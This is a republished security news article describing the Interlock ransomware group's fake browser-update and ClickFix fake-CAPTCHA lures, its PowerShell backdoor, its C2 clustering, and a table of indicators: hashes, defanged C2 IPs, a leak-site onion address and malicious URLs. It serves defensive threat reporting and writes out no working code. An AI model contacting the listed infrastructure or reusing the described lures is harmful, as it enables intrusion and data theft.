📅 Apr 16, 2025 ✍️ Cybernoz 📁 GBHackers 💬 0 ⏱️ 5 min

Interlock Ransomware Uses Multi-Stage Attack Through Legitimate Websites to Deliver Malicious Browser Updates

Interlock Ransomware Uses Multi-Stage Attack Through Legitimate Websites to Deliver Malicious Browser Updates

The Interlock ransomware intrusion set has escalated its operations across North America and Europe with sophisticated techniques.

Not falling under the typical Ransomware-as-a-Service (RaaS) category, Interlock operates independently, focusing primarily on Big Game Hunting and double extortion campaigns.

This group’s activities have been closely monitored by cybersecurity firms such as Sekoia Threat Detection & Research (TDR) and others, revealing their evolving tactics and tools.

– Advertisement –
Google News

Attack Mechanism and Execution

Interlock initiates its attack by compromising legitimate websites to host deceptive browser update pages, leveraging the trust users have in these platforms.

Interlock Ransomware Interlock Ransomware
Screenshot of Interlock’s DLS

Here’s how the attack unfolds:

1. Fake Updater Deployment:

    The ransomware’s initial access vector is a fake browser update hosted on compromised websites.

    These updates appear as legitimate Google Chrome or Microsoft Edge installers but are, in fact, PyInstaller files. When a user executes this update, it:

    • Downloads and runs a legitimate installer.
    • Simultaneously, it launches a PowerShelcl script acting as a backdoor.

    2.PowerShell Backdoor:

    This script operates in a loop, continuously executing HTTP requests to communicate with command-and-control (C2) servers. It’s designed for resilience, utilizing:

    • A continuous communication loop with the C2 server for persistence.
    • Collection of system information including user context, system details, and more, then transmitting this data to the attacker.

    3.Command Execution:

    The C2 server can issue various commands, including:

    • Terminating the backdoor.
    • Deploying additional malware like keyloggers or credential stealers (e.g., LummaStealer, BerserkStealer).

      Domain and IP Clustering for Resilience

      According to the Report, Interlock’s operators employ a strategy of IP address clustering to maintain their infrastructure’s resilience:

      Cluster Composition

      Each cluster typically includes:

      • One IP from BitLaunch, allowing cryptocurrency transactions.
      • One from Hetzner Online GmbH, known for its robust hosting services.
      • A third from various autonomous systems to complicate disruption efforts.

      ClickFix Technique for Initial Access

      Around January 2025, Interlock adopted the ClickFix technique:

      • Deceptive Prompts: Victims are persuaded to manually execute malicious PowerShell commands through fake CAPTCHA verifications or system prompts.
      • Fake Installer Distribution: This technique was used to distribute a fake installer payload, but its usage seemed to have been abandoned by February 2025.
      Interlock Ransomware Interlock Ransomware
       Fake Cloudflare CAPTCHA asking users to execute a command to access a website

      The sophistication and evolution of Interlock’s tactics, from using fake browser updates to employing social engineering techniques like ClickFix, illustrate its adaptability and potential for further growth.

      With a focus on high-value targets and the ability to evade traditional network security, Interlock remains a significant threat.

      Cybersecurity measures must be updated continuously to counter the dynamic strategies of this ransomware group.

      Indicators of Compromise (IoC)

      The following table lists the IoCs associated with Interlock’s activities:

      Category Indicator Type Indicators
      Fake Updater SHA-256 576d07cc8919c68914bf08663e0afd00d9f9fbf5263b5cccbded5d373905a296, f962e15c6efebb3c29fe399bb168066042b616affddd83f72570c979184ec55c, … (additional hashes)
      ClickFix PowerShell Loaders SHA-256 5c697162527a468a52c9e7b7dc3257dae4ae5142db62257753969d47f1db533e, eb587b2603dfc14b420865bb862fc905cb85fe7b4b5a781a19929fc2da88eb34, … (additional hashes)
      Interlock RAT SHA-256 1105a3050e6c842fb9411d4f21fd6fdb119861c15f7743e244180a4e64b19b83, 299a8ef490076664675e3b52d6767bf89ddfa6accf291818c537a600a96290d2, … (additional hashes)
      Keylogger SHA-256 5cbc2ae758043bb58664c28f32136e9cada50a8dc36c69670ddef0a3ef6757d8, df41085a8aa9ee9da6a03db08ad910b6ef5fcdc8fee7ebb19744331c5e70c782, … (additional hashes)
      BerserkStealer SHA-256 eb1cdf3118271d754cf0a1777652f83c3d11dc1f9a2b51e81e37602c43b47692, a5623b6a6f289bb328e4007385bdb1659407a9e825990a0faaef3625a2e782cf
      LummaStealer SHA-256 4672fe8b37b71be834825a2477d956e0f76f7d2016c194f1538139d21703fd6e
      Windows Interlock ransomware SHA-256 4a97599ff5823166112d9221d0e824af7896f6ca40cd3948ec129533787a3ea9, 33dc991e61ba714812aa536821b073e4274951a1e4a9bc68f71a802d034f4fb9, … (additional hashes)
      Small autoremove DLL used by the ransomware SHA-256 c9920e995fbc98cd3883ef4c4520300d5e82bab5d2a5c781e9e9fe694a43e82f
      Linux Interlock ransomware SHA-256 28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f
      Data Leak Site URL http://ebhmkoohccl45qesdbvrjqtyro2hmhkmh6vkyfyjjzfllm3ix72aqaid[.]onion
      Backdoor C2 – Cluster 1 IP Address 23.95.182[.]59, 195.201.21[.]34, 159.223.46[.]184
      Backdoor C2 – Cluster 2 IP Address 23.227.203[.]162, 65.109.226[.]176, 65.38.120[.]47
      Backdoor C2 – Cluster 3 IP Address 216.245.184[.]181, 212.237.217[.]182, 168.119.96[.]41
      Backdoor C2 – Cluster 4 IP Address 216.245.184[.]170, 65.108.80[.]58, 84.200.24[.]41
      Backdoor C2 – Cluster 5 IP Address 206.206.123[.]65, 49.12.102[.]206, 193.149.180[.]158
      Backdoor C2 – Cluster 6 IP Address 85.239.52[.]252, 5.252.177[.]228, 80.87.206[.]189
      Backdoor C2 – Cluster 7 IP Address 65.108.80[.]58, 212.104.133[.]72, 140.82.14[.]117
      Backdoor C2 – Cluster 8 IP Address 64.94.84[.]85, 49.12.69[.]80, 96.62.214[.]11
      Backdoor C2 – Cluster 9 IP Address 177.136.225[.]153, 188.34.195[.]44, 45.61.136[.]202
      Compromised URLs URL http://topsportracing[.]com/wp-az, http://topsportracing[.]com/az10, https://airbluefootgear[.]com/wp-includes/images/xits.php, … (additional URLs)
      ClickFix URLs URL https://microsoft-msteams[.]com/additional-check.html, https://microstteams[.]com/additional-check.html, https://advanceipscaner[.]com/additional-check.html, … (additional URLs)
      PowerShell backdoor C2 domains URL refrigerator-cheers-indicator-ferrari[.]trycloudflare.com, analytical-russell-cincinnati-settings[.]trycloudflare.com, … (additional URLs)

      Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!


Source link

About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.